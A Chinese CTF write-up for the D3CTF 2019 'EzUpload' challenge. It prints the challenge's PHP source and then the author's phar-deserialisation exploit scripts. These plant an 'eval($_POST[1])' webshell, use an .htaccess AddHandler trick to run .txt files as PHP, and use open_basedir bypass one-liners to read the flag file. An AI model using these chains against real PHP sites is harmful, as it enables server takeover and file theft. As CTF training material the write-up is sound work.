[D3CTF 2019]EzUpload

这题打起来麻烦的一批，开了七八九十十一二个靶机才打通，确实给👴打吐了

打开给了源码

&lt;?php 
class dir{ 
    public $userdir; 
    public $url; 
    public $filename; 
    public function __construct($url,$filename) { 
        $this-&gt;userdir = "upload/" . md5($_SERVER["REMOTE_ADDR"]);
        $this-&gt;url = $url;
        $this-&gt;filename  =  $filename;
        if (!file_exists($this-&gt;userdir)) {
            mkdir($this-&gt;userdir, 0777, true);
        }
    }
    public function checkdir(){
        if ($this-&gt;userdir != "upload/" . md5($_SERVER["REMOTE_ADDR"])) {
            die('hacker!!!');
        }
    }
    public function checkurl(){
        $r = parse_url($this-&gt;url);
        if (!isset($r['scheme']) || preg_match("/file|php/i",$r['scheme'])){
            die('hacker!!!');
        }
    }
    public function checkext(){
        if (stristr($this-&gt;filename,'..')){
            die('hacker!!!');
        }
        if (stristr($this-&gt;filename,'/')){
            die('hacker!!!');
        }
        $ext = substr($this-&gt;filename, strrpos($this-&gt;filename, ".") + 1);
        if (preg_match("/ph/i", $ext)){
            die('hacker!!!');
        }
    }
    public function upload(){
        $this-&gt;checkdir();
        $this-&gt;checkurl();
        $this-&gt;checkext();
        $content = file_get_contents($this-&gt;url,NULL,NULL,0,2048);
        if (preg_match("/\&lt;\?|value|on|type|flag|auto|set|\\\\/i", $content)){ die('hacker!!!'); } file_put_contents($this-&gt;userdir."/".$this-&gt;filename,$content);
    }
    public function remove(){
        $this-&gt;checkdir();
        $this-&gt;checkext();
        if (file_exists($this-&gt;userdir."/".$this-&gt;filename)){
            unlink($this-&gt;userdir."/".$this-&gt;filename);
        }
    }
    public function count($dir) {
        if ($dir === ''){
            $num = count(scandir($this-&gt;userdir)) - 2;
        }
        else {
            $num = count(scandir($dir)) - 2;
        }
        if($num &gt; 0) {
            return "you have $num files";
        }
        else{
            return "you don't have file";
        }
    }
    public function __toString() {
        return implode(" ",scandir(__DIR__."/".$this-&gt;userdir));
    }
    public function __destruct() {
        $string = "your file in : ".$this-&gt;userdir;
        file_put_contents($this-&gt;filename.".txt", $string);
        echo $string;
    }
}
 
if (!isset($_POST['action']) || !isset($_POST['url']) || !isset($_POST['filename'])){
    highlight_file(__FILE__);
    die();
}
 
$dir = new dir($_POST['url'],$_POST['filename']);
if($_POST['action'] === "upload") {
    $dir-&gt;upload();
}
elseif ($_POST['action'] === "remove") {
    $dir-&gt;remove();
}
elseif ($_POST['action'] === "count") {
    if (!isset($_POST['dir'])){
        echo $dir-&gt;count('');
    } else {
        echo $dir-&gt;count($_POST['dir']);
    }
}

<?php class dir{ public $userdir; public $url; public $filename; public function __construct($url,$filename) { $this->userdir = "upload/" . md5($_SERVER["REMOTE_ADDR"]); $this->url = $url; $this->filename = $filename; if (!file_exists($this->userdir)) { mkdir($this->userdir, 0777, true); } } public function checkdir(){ if ($this->userdir != "upload/" . md5($_SERVER["REMOTE_ADDR"])) { die('hacker!!!'); } } public function checkurl(){ $r = parse_url($this->url); if (!isset($r['scheme']) || preg_match("/file|php/i",$r['scheme'])){ die('hacker!!!'); } } public function checkext(){ if (stristr($this->filename,'..')){ die('hacker!!!'); } if (stristr($this->filename,'/')){ die('hacker!!!'); } $ext = substr($this->filename, strrpos($this->filename, ".") + 1); if (preg_match("/ph/i", $ext)){ die('hacker!!!'); } } public function upload(){ $this->checkdir(); $this->checkurl(); $this->checkext(); $content = file_get_contents($this->url,NULL,NULL,0,2048); if (preg_match("/\<\?|value|on|type|flag|auto|set|\\\\/i", $content)){ die('hacker!!!'); } file_put_contents($this->userdir."/".$this->filename,$content); } public function remove(){ $this->checkdir(); $this->checkext(); if (file_exists($this->userdir."/".$this->filename)){ unlink($this->userdir."/".$this->filename); } } public function count($dir) { if ($dir === ''){ $num = count(scandir($this->userdir)) - 2; } else { $num = count(scandir($dir)) - 2; } if($num > 0) { return "you have $num files"; } else{ return "you don't have file"; } } public function __toString() { return implode(" ",scandir(__DIR__."/".$this->userdir)); } public function __destruct() { $string = "your file in : ".$this->userdir; file_put_contents($this->filename.".txt", $string); echo $string; } } if (!isset($_POST['action']) || !isset($_POST['url']) || !isset($_POST['filename'])){ highlight_file(__FILE__); die(); } $dir = new dir($_POST['url'],$_POST['filename']); if($_POST['action'] === "upload") { $dir->upload(); } elseif ($_POST['action'] === "remove") { $dir->remove(); } elseif ($_POST['action'] === "count") { if (!isset($_POST['dir'])){ echo $dir->count(''); } else { echo $dir->count($_POST['dir']); } }

有文件上传点，有反序列化，没过滤phar。phar反序列化

$this->checkext()过滤了php后缀，能上传.htaccess文件，但是会检测文件内容

我们开始了解的知识可以知道.htaccess文件一般的形式都是

<FilesMatch "1.jpg">
 SetHandler application/x-httpd-php
</FilesMatch>

或者

AddType application/x-httpd-php .txt

很明显不太能绕过去，查了下资料，还可以这样解析

AddHandler php7-script .txt

所以思路比较明显了，我们上传一个txt文件解析php就行

这里给了_toSrting()方法，扫了目录，暂时不知道有啥用u1s1，下面会拼接txt。

试了一会儿，发现直接上传触发生成不了文件，所以需要用到scandir函数了。我们需要知道绝对路径，才能正确写入文件

&lt;?php 
class dir{ 
    public $userdir; 
    public $url; 
    public $filename; 
} 
$d = new dir();
$d-&gt;userdir = new dir();
$d-&gt;userdir-&gt;userdir = "../";
$phar = new Phar("1.phar");
$phar-&gt;startBuffering();
$phar-&gt;setStub("GIF89A"."__HALT_COMPILER();"); //设置stub，增加gif文件头用以欺骗检测
$phar-&gt;setMetadata($d); //将自定义meta-data存入manifest
$phar-&gt;addFromString("test.jpg", "test"); //添加要压缩的文件
$phar-&gt;stopBuffering();

所以得到绝对路径（这里可以不用gzip

然后写入txt文件并触发phar

&lt;?php 
class dir{ 
    public $userdir; 
    public $url; 
    public $filename; 
} 
$a = new dir("url", "filename"); 
$a-&gt;filename = '/var/www/html/8b5c8441a8ff8e15/upload/adeee0c170ad4ffb110df0cde294aecd/webshell';
$a-&gt;userdir = '&lt;?php eval($_POST[1]); phpinfo();'; 
$phar = new Phar("2.phar"); 
$phar-&gt;startBuffering();
$phar-&gt;setStub("GIF89A"."__HALT_COMPILER();"); //设置stub，增加gif文件头用以欺骗检测
$phar-&gt;setMetadata($a); //将自定义meta-data存入manifest
$phar-&gt;addFromString("test.jpg", "test"); //添加要压缩的文件
$phar-&gt;stopBuffering();

发现写入不了，老是hacker我。看了下wp发现用gzip压缩下就好了,然后发现触发了phar后写不进去文件。。重试亿次

成功写入，然后写入htaccess

data:image/png;base64,QWRkSGFuZGxlciBwaHA3LXNjcmlwdCAudHh0将base64编码的：.htaccess写入

再试亿次，重开亿次靶机，

蚁剑连接，有disablefunction，绕一下

或者
ini_set('open_basedir', '..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir', '/');var_dump(scandir('/'));

ini_set('open_basedir', '..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir', '/');var_dump(show_source('/F1aG_1s_H4r4'));

拿到flag

看到官方wp用的是glob+爆破路径，没复现

https://www.anquanke.com/post/id/193939#h3-7

发表评论 取消回复

发表评论取消回复